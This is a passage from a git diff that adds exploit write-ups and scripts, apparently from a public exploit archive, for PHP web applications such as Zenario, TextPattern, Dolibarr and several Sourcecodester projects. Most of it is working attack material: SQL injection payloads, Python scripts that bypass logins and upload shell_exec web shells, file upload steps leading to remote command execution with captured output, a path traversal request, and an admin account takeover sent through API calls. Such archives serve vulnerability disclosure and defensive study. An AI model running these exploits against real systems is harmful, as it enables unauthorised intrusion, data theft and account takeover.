+ Payload: user_email=test@test.com' AND (SELECT 7267 FROM(SELECT COUNT(*),CONCAT(0x7176717071,(SELECT (ELT(7267=7267,1))),0x7162716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- pCej&password=`&login_button=
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: user_email=test@test.com' AND (SELECT 2884 FROM (SELECT(SLEEP(5)))KezZ)-- bBqz&password=`&login_button=
+----- END -----
+
+
+----- Authenticated RCE via Arbitrary File Upload -----
+# For this attack, it is assumed that you've obtained credentials via the SQL Injection attack above and have logged in.
+
+Step 1.) After logging in, click the "Initialization" option and "Add System Info".
+Step 2.) Populate the blank form with arbitrary data. At the bottom of the form, there is an option to upload a logo. Upload your evil.php file here and click "Finish".
+Step 3.) By default, the file is uploaded to http:///Staff_registration/media/evil.php. Navigate to it for RCE.
+----- END ------
\ No newline at end of file
diff --git a/exploits/php/webapps/49988.txt b/exploits/php/webapps/49988.txt
new file mode 100644
index 000000000..28686e9bb
--- /dev/null
+++ b/exploits/php/webapps/49988.txt
@@ -0,0 +1,26 @@
+# Exploit Title: Zenario CMS 8.8.52729 - 'cID' Blind & Error based SQL injection (Authenticated)
+# Date: 05–02–2021
+# Exploit Author: Avinash R
+# Vendor Homepage: https://zenar.io/
+# Software Link: https://github.com/TribalSystems/Zenario/releases/tag/8.8
+# Version: 8.8.52729
+# Tested on: Windows 10 Pro (No OS restrictions)
+# CVE : CVE-2021–27673
+# Reference: https://deadsh0t.medium.com/blind-error-based-authenticated-sql-injection-on-zenario-8-8-52729-cms-d4705534df38
+
+##### Step To Reproduce #####
+
+1) Login to the admin page of Zenario CMS with admin credentials, which is
+http://server_ip/zenario/admin.php
+
+2) Click on, New → HTML page to create a new sample page and intercept it
+with your interceptor.
+
+3) Just a single quote on the 'cID' parameter will confirm the SQL
+injection.
+
+4) After confirming that the 'cID' parameter is vulnerable to SQL
+injection, feeding the request to SQLMAP will do the rest of the work for
+you.
+
+############ End ############
\ No newline at end of file
diff --git a/exploits/php/webapps/49996.txt b/exploits/php/webapps/49996.txt
new file mode 100644
index 000000000..3c4a7c68e
--- /dev/null
+++ b/exploits/php/webapps/49996.txt
@@ -0,0 +1,43 @@
+# Exploit Title : TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated)
+# Date : 2021/09/06
+# Exploit Author : Mert Daş merterpreter@gmail.com
+# Software Link : https://textpattern.com/file_download/113/textpattern-4.8.7.zip
+# Software web : https://textpattern.com/
+# Tested on: Server : Xampp
+
+First of all we should use file upload section to upload our shell.
+Our shell contains this malicious code:
+
+1) Go to content section .
+2) Click Files and upload malicious php file.
+3) go to yourserver/textpattern/files/yourphp.php?cmd=yourcode;
+
+After upload our file , our request and respons is like below :
+
+Request:
+
+GET /textpattern/files/cmd.php?cmd=whoami HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)
+Gecko/20100101 Firefox/89.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: txp_login_public=18e9bf4a21admin; language=en-gb; currency=GBP;
+PHPSESSID=cctbu6sj8571j2t6vp7g8ab7gi
+Upgrade-Insecure-Requests: 1
+
+
+Response:
+
+HTTP/1.1 200 OK
+Date: Thu, 10 Jun 2021 00:32:41 GMT
+Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20
+X-Powered-By: PHP/7.4.20
+Content-Length: 22
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+pc\mertdas
\ No newline at end of file
diff --git a/exploits/php/webapps/50090.txt b/exploits/php/webapps/50090.txt
new file mode 100644
index 000000000..c5e0f0e51
--- /dev/null
+++ b/exploits/php/webapps/50090.txt
@@ -0,0 +1,55 @@
+# Exploit Title: Church Management System 1.0 - Unrestricted File Upload to Remote Code Execution (Authenticated)
+# Date: 07/03/2021
+# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/11206/church-management-system.html
+# Version: 1.0
+# Tested on: Windows 10
+# CVE : N/A
+
+# Proof of Concept :
+
+1- Login any user account and change profile picture.
+2- Upload any php shell by altering it's extension to .jpg or .png. (i.e test.php.jpg)
+3- Before uploading your file, intercept your traffic by using any proxy.
+4- Change test.php.jpg file to test.php and click forward.
+5- Find your test.php file path and try any command.
+
+
+###################### REQUEST ##########################################
+
+GET /cman/members/uploads/test.php?cmd=SYSTEMINFO HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
+Accept: image/webp,*/*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Referer: http://localhost/cman/members/dashboard.php
+Cookie: PHPSESSID=cne8l4ct93krjqobdus7nv2sjc
+
+####################### RESPONSE #########################################
+
+HTTP/1.1 200 OK
+Date: Sat, 03 Jul 2021 11:28:16 GMT
+Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/8.0.3
+X-Powered-By: PHP/8.0.3
+Content-Length: 4410
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+
+Host Name: MRT
+OS Name: Microsoft Windows 10 Pro
+OS Version: 10.0.19043 N/A Build 19043
+OS Manufacturer: Microsoft Corporation
+OS Configuration: Standalone Workstation
+OS Build Type: Multiprocessor Free
+Registered Owner: Murat
+System Boot Time: 6/25/2021, 2:51:40 PM
+System Manufacturer: Dell Inc.
+System Type: x64-based PC
+Processor(s): 1 Processor(s) Installed.
+
+
+############################################################################
\ No newline at end of file
diff --git a/exploits/php/webapps/50106.txt b/exploits/php/webapps/50106.txt
new file mode 100644
index 000000000..91fff4622
--- /dev/null
+++ b/exploits/php/webapps/50106.txt
@@ -0,0 +1,161 @@
+# Exploit Title: Phone Shop Sales Managements System 1.0 - 'Multiple' Arbitrary File Upload to Remote Code Execution
+# Date: 2021-07-06
+# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/10882/phone-shop-sales-managements-system.html
+# Version: 1.0
+# Tested on: Windows 10, XAMPP
+
+
+###########
+# PoC 1: #
+###########
+
+Request:
+========
+
+POST /osms/Execute/ExAddProduct.php HTTP/1.1
+Host: localhost
+Content-Length: 2160
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIBZWMUliFtu0otJ0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://localhost/osms/AddNewProduct.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=6i2a5u327llvco5kgglbalhdn0
+Connection: close
+
+------WebKitFormBoundaryIBZWMUliFtu0otJ0
+Content-Disposition: form-data; name="ProductName"
+
+camera
+------WebKitFormBoundaryIBZWMUliFtu0otJ0
+Content-Disposition: form-data; name="BrandName"
+
+soskod
+------WebKitFormBoundaryIBZWMUliFtu0otJ0
+Content-Disposition: form-data; name="ProductPrice"
+
+12
+------WebKitFormBoundaryIBZWMUliFtu0otJ0
+Content-Disposition: form-data; name="Quantity"
+
+1
+------WebKitFormBoundaryIBZWMUliFtu0otJ0
+Content-Disposition: form-data; name="TotalPrice"
+
+12
+------WebKitFormBoundaryIBZWMUliFtu0otJ0
+Content-Disposition: form-data; name="DisplaySize"
+
+15
+------WebKitFormBoundaryIBZWMUliFtu0otJ0
+Content-Disposition: form-data; name="OperatingSystem"
+
+windows
+------WebKitFormBoundaryIBZWMUliFtu0otJ0
+Content-Disposition: form-data; name="Processor"
+
+4
+------WebKitFormBoundaryIBZWMUliFtu0otJ0
+Content-Disposition: form-data; name="InternalMemory"
+
+4
+------WebKitFormBoundaryIBZWMUliFtu0otJ0
+Content-Disposition: form-data; name="RAM"
+
+4
+------WebKitFormBoundaryIBZWMUliFtu0otJ0
+Content-Disposition: form-data; name="CameraDescription"
+
+lens
+------WebKitFormBoundaryIBZWMUliFtu0otJ0
+Content-Disposition: form-data; name="BatteryLife"
+
+3300
+------WebKitFormBoundaryIBZWMUliFtu0otJ0
+Content-Disposition: form-data; name="Weight"
+
+500
+------WebKitFormBoundaryIBZWMUliFtu0otJ0
+Content-Disposition: form-data; name="Model"
+
+AIG34
+------WebKitFormBoundaryIBZWMUliFtu0otJ0
+Content-Disposition: form-data; name="Dimension"
+
+5 inch
+------WebKitFormBoundaryIBZWMUliFtu0otJ0
+Content-Disposition: form-data; name="ASIN"
+
+9867638
+------WebKitFormBoundaryIBZWMUliFtu0otJ0
+Content-Disposition: form-data; name="ProductImage"; filename="rev.php"
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundaryIBZWMUliFtu0otJ0
+Content-Disposition: form-data; name="date2"
+
+2020-06-03
+------WebKitFormBoundaryIBZWMUliFtu0otJ0
+Content-Disposition: form-data; name="Description"
+
+accept
+------WebKitFormBoundaryIBZWMUliFtu0otJ0
+Content-Disposition: form-data; name="_wysihtml5_mode"
+
+1
+------WebKitFormBoundaryIBZWMUliFtu0otJ0--
+
+
+
+###########
+# PoC 2: #
+###########
+
+Request:
+========
+
+POST /osms/Execute/ExChangePicture.php HTTP/1.1
+Host: localhost
+Content-Length: 463
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4Dm8cGBqGNansHqI
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://localhost/osms/UserProfile.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=4nksm1jl45bfbbd5ovn0fpi594
+Connection: close
+
+------WebKitFormBoundary4Dm8cGBqGNansHqI
+Content-Disposition: form-data; name="IDUser"
+
+6
+------WebKitFormBoundary4Dm8cGBqGNansHqI
+Content-Disposition: form-data; name="Image"; filename="rev.php"
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundary4Dm8cGBqGNansHqI--
+
+
+
+###########
+# Access: #
+###########
+
+# Webshell access via:
+PoC 1: http://localhost/osms/assets/img/Product_Uploaded/rev.php?rev=whoami
+PoC 2: http://localhost/osms/assets/img/Profile_Uploaded/rev.php?rev=whoami
+
+# Output:
+result: windows10\user
\ No newline at end of file
diff --git a/exploits/php/webapps/50107.py b/exploits/php/webapps/50107.py
new file mode 100755
index 000000000..7b111ad2e
--- /dev/null
+++ b/exploits/php/webapps/50107.py
@@ -0,0 +1,11 @@
+# Exploit Title: WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal
+# Date: 05.07.2021
+# Exploit Author: TheSmuggler
+# Vendor Homepage: https://gotmls.net/
+# Software Link: https://gotmls.net/downloads/
+# Version: <= 4.20.72
+# Tested on: Windows
+
+import requests
+
+print(requests.get("http://127.0.0.1/wp-admin/admin-ajax.php?action=duplicator_download&file=..\..\..\..\..\..\..\..\..\Windows\win.ini", headers={"User-Agent":"Chrome"}).text)
\ No newline at end of file
diff --git a/exploits/php/webapps/50117.txt b/exploits/php/webapps/50117.txt
new file mode 100644
index 000000000..3dbf89667
--- /dev/null
+++ b/exploits/php/webapps/50117.txt
@@ -0,0 +1,45 @@
+# Exploit Title: Zoo Management System 1.0 - 'Multiple' Stored Cross-Site-Scripting (XSS)
+# Date: 08/07/2021
+# Exploit Author: Subhadip Nag
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/zoo-management-system-using-php-and-mysql/
+# Version: 1.0
+# Tested on: Server: XAMPP
+
+# Description #
+
+Zoo Management System 1.0 is vulnerable to 'Multiple' stored cross site scripting because of insufficient user supplied data.
+
+# Proof of Concept (PoC) : Exploit #
+
+1) Goto: http://localhost/ZMSP/zms/admin/index.php and Login(given User & password)
+2) Goto: http://localhost/ZMSP/zms/admin/add-animals.php
+3) Fill out Animal name, Breed and Description with given payload:
+4) Goto: http://localhost/ZMSP/zms/admin/manage-animals.php
+5) Stored XSS payload is fired
+
+6) Goto: http://localhost/ZMSP/zms/admin/manage-ticket.php
+7) Edit any Action field with the following payload: and Update
+8) Go back and again click 'Manage Type Ticket'
+9) Stored XSS payload is fired
+
+10) Goto: http://localhost/ZMSP/zms/admin/aboutus.php
+11) In the Page 'Title' & 'Description',Enter the Payload: and Click Update
+
+12) Goto: http://localhost/ZMSP/zms/admin/contactus.php
+13) Put the Same Payload in the Page 'Title' & 'Description' and Click Update
+14) Logout and click 'Back Home'
+15) Our XSS payload successful
+
+
+# Image PoC : Reference Image #
+
+1) https://ibb.co/g4hFQDV
+2) https://ibb.co/frbpf9c
+3) https://ibb.co/NtKrc9C
+4) https://ibb.co/cFGWhCz
+4) https://ibb.co/CMXmN4f
+5) https://ibb.co/C0dV0PC
+6) https://ibb.co/4ZW8tb3
+7) https://ibb.co/3zgFq9b
+8) https://ibb.co/wS8wXj8
\ No newline at end of file
diff --git a/exploits/php/webapps/50127.txt b/exploits/php/webapps/50127.txt
new file mode 100644
index 000000000..b407b8dd1
--- /dev/null
+++ b/exploits/php/webapps/50127.txt
@@ -0,0 +1,15 @@
+# Exploit Title: WordPress Plugin Current Book 1.0.1 - 'Book Title and Author field' Stored Cross-Site Scripting (XSS)
+# Date: 14/07/2021
+# Exploit Author: Vikas Srivastava
+# Vendor Homepage:
+# Software Link: https://wordpress.org/plugins/current-book/
+# Version: 1.0.1
+# Category: Web Application
+
+How to Reproduce this Vulnerability:
+
+1. Install WordPress 5.7.2
+2. Install and activate Custom Book
+3. Navigate to Tools >> Current Book and enter the XSS payload into the Book and Author input field.
+4. Click Update Options
+5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up.
\ No newline at end of file
diff --git a/exploits/php/webapps/50159.py b/exploits/php/webapps/50159.py
new file mode 100755
index 000000000..63e2bd3c6
--- /dev/null
+++ b/exploits/php/webapps/50159.py
@@ -0,0 +1,107 @@
+# Exploit Title: Event Registration System with QR Code 1.0 - Authentication Bypass & RCE
+# Exploit Author: Javier Olmedo
+# Date: 27/07/2021
+# Vendor: Sourcecodester
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/event_0.zip
+# Affected Version: 1.0
+# Category: WebApps
+# Platform: PHP
+# Tested on: Ubuntu Server & Windows 10 Pro
+
+import os, re, sys, argparse, requests
+from termcolor import cprint
+
+def banner():
+ os.system("cls")
+ print('''
+ ___________ __
+ \_ _____/__ __ ____ _____/ |_
+ | __)_\ \/ // __ \ / \ __\\
+ | \\\\ /\ ___/| | \ |
+ /_______ / \_/ \___ >___| /__|
+ \/ \/ \/
+ Registration System
+ --[Authentication Bypass and RCE]--
+ @jjavierolmedo
+ ''')
+
+def get_args():
+ parser = argparse.ArgumentParser(description='Event - Authentication Bypass and RCE Exploit')
+ parser.add_argument('-t', '--target', dest="target", required=True, action='store', help='Target url')
+ parser.add_argument('-p', '--proxy', dest="proxy", required=False, action='store', help='Use proxy')
+ args = parser.parse_args()
+ return args
+
+def auth_bypass(s, proxies, url):
+ data = {
+ "username":"admin'#",
+ "password":""
+ }
+
+ r = s.post(url, data=data, proxies=proxies)
+
+ if('{"status":"success"}' in r.text):
+ cprint("[+] Authenticacion Bypass Success!\n", "green")
+ return s
+ else:
+ cprint("[-] Authenticacion Bypass Error!\n", "red")
+ sys.exit(0)
+
+def upload_shell(s, proxies, url):
+ content = "' . shell_exec($_REQUEST['cmd']) . '';?>"
+ file = {
+ 'img':('cmd.php',content)
+ }
+
+ data = {
+ "name":"Event Registration System with QR Code - PHP",
+ "short_name":"ERS-QR-PHP",
+ }
+
+ r = s.post(url, files=file, data=data, proxies=proxies)
+
+ if('1' in r.text and r.status_code == 200):
+ cprint("[+] Upload Shell Success!\n", "green")
+ return s
+ else:
+ cprint("[-] Upload Shell Error!\n", "red")
+ sys.exit(0)
+
+def get_shell_url(s, proxies, url):
+ r = s.get(url, proxies=proxies)
+ regex = '\_cmd.php"> (.*?)'
+ shell_name = re.findall(regex, r.text)[0]
+ url_shell = "http://localhost/event/uploads/{shell_name}?cmd=whoami".format(shell_name=shell_name)
+ cprint("[+] Use your shell --> {url_shell}\n".format(url_shell=url_shell), "green")
+
+def main():
+ banner()
+ args = get_args()
+ target = args.target
+ proxies = {'http':'','https':''}
+ if args.proxy:
+ proxies = {'http':'{proxy}'.format(proxy=args.proxy),'https':'{proxy}'.format(proxy=args.proxy)}
+
+ login_url = target + "/event/classes/Login.php?f=rlogin"
+ upload_url = target + "/event/classes/SystemSettings.php?f=update_settings"
+ shell_url = target + "/event/uploads/"
+
+ s = requests.Session()
+ s = auth_bypass(s, proxies, login_url)
+ s = upload_shell(s, proxies, upload_url)
+ s = get_shell_url(s, proxies, shell_url)
+
+if __name__ == "__main__":
+ try:
+ main()
+ except KeyboardInterrupt:
+ cprint("[-] User aborted session\n", "red")
+ sys.exit(0)
+
+# Disclaimer
+# The information contained in this notice is provided without any guarantee of use or otherwise.
+# The redistribution of this notice is explicitly permitted for insertion into vulnerability
+# databases, provided that it is not modified and due credit is granted to the author.
+# The author prohibits the malicious use of the information contained herein and accepts no responsibility.
+# All content (c)
+# Javier Olmedo
\ No newline at end of file
diff --git a/exploits/php/webapps/50176.txt b/exploits/php/webapps/50176.txt
new file mode 100644
index 000000000..c0986a15a
--- /dev/null
+++ b/exploits/php/webapps/50176.txt
@@ -0,0 +1,9 @@
+# Exploit Title: qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated)
+# Date: 03/08/2021
+# Exploit Author: Leon Trappett (thepcn3rd)
+# Vendor Homepage: https://qdpm.net/
+# Software Link: https://sourceforge.net/projects/qdpm/files/latest/download
+# Version: 9.2
+# Tested on: Ubuntu 20.04 Apache2 Server running PHP 7.4
+
+The password and connection string for the database are stored in a yml file. To access the yml file you can go to http:///core/config/databases.yml file and download.
\ No newline at end of file
diff --git a/exploits/php/webapps/50223.txt b/exploits/php/webapps/50223.txt
new file mode 100644
index 000000000..5a3c036a8
--- /dev/null
+++ b/exploits/php/webapps/50223.txt
@@ -0,0 +1,25 @@
+# Exploit Title: Simple Phone book/directory 1.0 - 'Username' SQL Injection (Unauthenticated)
+# Date: 21/08/2021
+# Exploit Author: Justin White
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/13011/phone-bookphone-directory.html
+# Version: 1.0
+# Testeted on: Linux (Ubuntu 20.04) using LAMPP
+
+## SQL Injection
+
+# Vulnerable page
+http://localhost/PhoneBook/index.php
+
+# Vulnerable paramater
+username1 & password
+
+# POC
+Username = ' or sleep(5)='-- -
+Password = ' '
+
+Using these to login will have the webapp sleep for 5 seconds, then you will be logged in as "' or sleep(5)='-- -"
+
+# Vulnerable Code
+index.php line 13
+$sql = mysqli_query($dbcon,"SELECT * FROM userdetails WHERE username = '$username' AND password = '$password'");
\ No newline at end of file
diff --git a/exploits/php/webapps/50244.py b/exploits/php/webapps/50244.py
new file mode 100755
index 000000000..183aa58ec
--- /dev/null
+++ b/exploits/php/webapps/50244.py
@@ -0,0 +1,73 @@
+# Exploit Title: Traffic Offense Management System 1.0 - SQLi to Remote Code Execution (RCE) (Unauthenticated)
+# Date: 19.08.2021
+# Exploit Author: Tagoletta (Tağmaç)
+# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
+# Version: 1.0
+# Tested on: Linux
+
+import requests
+import random
+import string
+import json
+from bs4 import BeautifulSoup
+
+url = input("TARGET = ")
+
+if not url.startswith('http://') and not url.startswith('https://'):
+ url = "http://" + url
+if not url.endswith('/'):
+ url = url + "/"
+
+payload= ""
+
+let = string.ascii_lowercase
+shellname = ''.join(random.choice(let) for i in range(15))
+
+
+session = requests.session()
+
+print("Login Bypass\n")
+
+request_url = url + "/classes/Login.php?f=login"
+post_data = {"username": "admin' or '1'='1'#", "password": ""}
+bypassUser = session.post(request_url, data=post_data)
+data = json.loads(bypassUser.text)
+status = data["status"]
+if status == "success":
+
+ print("Finding first driver\n")
+
+ getHTML = session.get(url + "admin/?page=drivers")
+ getHTMLParser = BeautifulSoup(getHTML.text, 'html.parser')
+ findFirstDriverID = getHTMLParser.find("a", {"class": "delete_data"}).get("data-id")
+
+ print("Found firs driver ID : " + findFirstDriverID)
+
+ print("\nFinding path")
+
+ findPath = session.get(url + "admin/?page=drivers/manage_driver&id="+findFirstDriverID+'\'')
+ findPath = findPath.text[findPath.text.index("Warning : ")+17:findPath.text.index(" on line ")]
+ findPath = findPath[findPath.index("")+3:len(findPath)]
+
+ parser = findPath.split('\\')
+ parser.pop()
+ findPath = ""
+ for find in parser:
+ findPath += find + "/"
+
+ print("\nFound Path : " + findPath)
+ shellPath = findPath[findPath.index("admin/"):len(findPath)]
+
+ SQLtoRCE = "' LIMIT 0,1 INTO OUTFILE '#PATH#' LINES TERMINATED BY #PAYLOAD# -- -"
+ SQLtoRCE = SQLtoRCE.replace("#PATH#",findPath+shellname+".php")
+ SQLtoRCE = SQLtoRCE.replace("#PAYLOAD#", "0x3"+payload.encode("utf-8").hex())
+
+ print("\n\nShell Uploading...")
+ session.get(url + "admin/?page=drivers/manage_driver&id="+findFirstDriverID+SQLtoRCE)
+
+ print("\nShell Path : " + url+shellPath+shellname+".php")
+ shellOutput = session.get(url+shellPath+shellname+".php?tago=whoami")
+ print("\n\nShell Output : "+shellOutput.text)
+
+else:
+ print("No bypass user")
\ No newline at end of file
diff --git a/exploits/php/webapps/50248.txt b/exploits/php/webapps/50248.txt
new file mode 100644
index 000000000..da2841c70
--- /dev/null
+++ b/exploits/php/webapps/50248.txt
@@ -0,0 +1,192 @@
+# Exploit Title: Dolibarr ERP/CRM 14.0.1 - Privilege Escalation
+# Date: April 8, 2021
+# Exploit Author: Vishwaraj101
+# Vendor Homepage: https://www.dolibarr.org/
+# Affected Version: <= 14.0.1
+# Patch: https://github.com/Dolibarr/dolibarr/commit/489cff46a37b04784d8e884af7fc2ad623bee17d
+
+*Summary:*
+Using the below chain of issues attacker can compromise any dolibarr
+user account including the admin.
+
+*Poc:*
+
+ 1. Visit https://example.com/api/index.php/login?login=demo&password=demo
+ try to login with a test user with 0 permissons or less permissions.
+ 2. We will receive an api token in return.
+ 3. Next we need to fetch the user id of the user whose account we want
+ to own.
+
+
+
+*First we need to fetch the user id of the admin user using the below api.*
+
+*Request1:*
+
+GET /api/index.php/users/login/admin HTTP/1.1Host:
+preview2.dolibarr.ohttps://preview2.dolibarr.org/api/index.php/users/login/adminrg
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
+root@tqn9xk6rn6fq8x9ijbmpouosrjxan3srh.burpcollaborator.netAccept:
+application/json
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflateDOLAPIKEY: test1337Connection: close
+
+*This will return the user details using the username. Now update the
+victim user account via below api (include the json body received from the
+previous request1 and replace the email id from below json to the attacker
+controlled email)*
+
+
+*Request2:*PUT /api/index.php/users/*12* HTTP/1.1
+
+Host: preview2.dolibarr.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1;
+WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87
+Safari/537.36 root@67bmexn44jw3paqv0o3257558wen5mwal.burpcollaborator.netAccept:
+application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip,
+deflateDOLAPIKEY: test1337Origin:
+https://preview2.dolibarr.orgConnection: closeReferer:
+http://5z5l6wf3wio2h9iusnv1x6x40v6mxkw8l.burpcollaborator.net/refContent-Length:
+3221
+{
+ "id": "12",
+ "statut": "1",
+ "employee": "1",
+ "civility_code": null,
+ "gender": "woman",
+ "birth": 495583200,
+ "email": "*attacker@example.com *",
+ "personal_email": "",
+ "socialnetworks": {
+ "facebook": "",
+ "skype": "",
+ "twitter": "",
+ "linkedin": "",
+ "instagram": "",
+ "snapchat": "",
+ "googleplus": "",
+ "youtube": "",
+ "whatsapp": "",
+ "tumblr": "",
+ "vero": "",
+ "viadeo": "",
+ "slack": "",
+ "xing": "",
+ "meetup": "",
+ "pinterest": "",
+ "flickr": "",
+ "500px": "",
+ "giphy": "",
+ "gifycat": "",
+ "dailymotion": "",
+ "vimeo": "",
+ "periscope": "",
+ "twitch": "",
+ "discord": "",
+ "wikipedia": "",
+ "reddit": "",
+ "quora": "",
+ "tripadvisor": "",
+ "mastodon": "",
+ "diaspora": "",
+ "viber": ""
+ },
+ "job": "Admin Technical",
+ "signature": "",
+ "address": "",
+ "zip": "",
+ "town": "",
+ "state_id": null,
+ "state_code": null,
+ "state": null,
+ "office_phone": "",
+ "office_fax": "",
+ "user_mobile": "",
+ "personal_mobile": "",
+ "admin": "1",
+ "login": "admin",
+ "entity": "0",
+ "datec": 1507187386,
+ "datem": 1617819214,
+ "socid": null,
+ "contact_id": null,
+ "fk_member": null,
+ "fk_user": "11",
+ "fk_user_expense_validator": null,
+ "fk_user_holiday_validator": null,
+ "clicktodial_url": null,
+ "clicktodial_login": null,
+ "clicktodial_poste": null,
+ "datelastlogin": 1617816891,
+ "datepreviouslogin": 1617815935,
+ "datestartvalidity": "",
+ "dateendvalidity": "",
+ "photo": "com.jpg",
+ "lang": "fr_FR",
+ "rights": {
+ "user": {
+ "user": {},
+ "self": {}
+ }
+ },
+ "conf": {},
+ "users": [],
+ "parentof": null,
+ "accountancy_code": "",
+ "weeklyhours": "39.00000000",
+ "color": "",
+ "dateemployment": "",
+ "dateemploymentend": "",
+ "default_c_exp_tax_cat": null,
+ "default_range": null,
+ "fk_warehouse": null,
+ "import_key": null,
+ "array_options": [],
+ "array_languages": null,
+ "linkedObjectsIds": null,
+ "canvas": null,
+ "fk_project": null,
+ "contact": null,
+ "thirdparty": null,
+ "user": null,
+ "origin": null,
+ "origin_id": null,
+ "ref": "12",
+ "ref_ext": null,
+ "status": null,
+ "country": null,
+ "country_id": null,
+ "country_code": "",
+ "region_id": null,
+ "barcode_type": null,
+ "barcode_type_code": null,
+ "barcode_type_label": null,
+ "barcode_type_coder": null,
+ "mode_reglement_id": null,
+ "cond_reglement_id": null,
+ "demand_reason_id": null,
+ "transport_mode_id": null,
+ "cond_reglement": null,
+ "modelpdf": null,
+ "last_main_doc": null,
+ "fk_bank": null,
+ "fk_account": null,
+ "note_public": "",
+ "note_private": "",
+ "note": "",
+ "name": null,
+ "lastname": "Adminson",
+ "firstname": "Alice",
+ "civility_id": null,
+ "date_creation": null,
+ "date_validation": null,
+ "date_modification": null,
+ "specimen": 0,
+ "alreadypaid": null,
+ "liste_limit": 0
+}
+
+This will reset the admin email account to the attacker controlled
+email account, now using the password reset feature attacker will
+reset the admin account password and will gain access to the admin
+account.
\ No newline at end of file
diff --git a/exploits/php/webapps/50361.txt b/exploits/php/webapps/50361.txt
new file mode 100644
index 000000000..ed15e7644
--- /dev/null
+++ b/exploits/php/webapps/50361.txt
@@ -0,0 +1,115 @@
+# Exploit Title: Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation via XML Signature Wrapping
+# Date: 09/07/2021
+# Exploit Author: Cristian 'void' Giustini
+# Vendor Homepage: https://www.miniorange.com/
+# Software Link: https://www.drupal.org/project/miniorange_saml
+# Version: 8.x-2.22 (REQUIRED)
+# Tested on: Linux Debian (PHP 8.0.7 with Apache/2.4.38)
+# Original article: https://blog.hacktivesecurity.com/index.php/2021/07/09/sa-contrib-2021-036-notsosaml-privilege-escalation-via-xml-signature-wrapping-on-minorangesaml-drupal-plugin/
+# Drupal Security Advisory URL: https://www.drupal.org/sa-contrib-2021-036
+
+---
+
+The MiniorangeSAML Drupal Plugin v. 8.x-2.22 is vulnerable to XML
+Signature Wrapping Attacks that could allows an attacker to perform
+privilege escalation attacks.
+
+In order to exploit the vulnerability, the plugin must be configured
+with the "Either SAML reponse or SAML assertion must be signed" options
+enabled and an empty "x509 certificate".
+
+Administrator point of view:
+
+- Install a Drupal version (for the PoC the version 9.1.10 has been used)
+
+- Configure an external SSO system like Auth0
+
+- Configure the plugin with the Auth0 provider by checking the "Either
+SAML response or SAML assertion must be signed" and empty "x509 certificate"
+
+
+Attacker point of view:
+
+- Register a normal user on the website
+
+- Perform a login
+
+- Intercept the request with Burp Suite and decode the SAMLResponse
+parameter
+
+- Inject an additional object before the original one
+(example here:
+https://gist.github.com/voidz0r/30c0fb7be79abf8c79d1be9d424c9e3b#file-injected_object-xml)
+(SAMLRaider Burp extension, XSW3 payload)
+
+
+ urn:miniorange-research.eu.auth0.com
+
+ admin
+
+
+
+
+
+ http://localhost:8080
+
+
+
+ urn:oasis:names:tc:SAML:2.0:ac:classes:unspecified
+
+
+
+
+ admin
+
+
+ test@example.com
+
+
+ test@example.com
+
+
+ test@example.com
+
+
+ Username-Password-Authentication
+
+
+ auth0
+
+
+ false
+
+
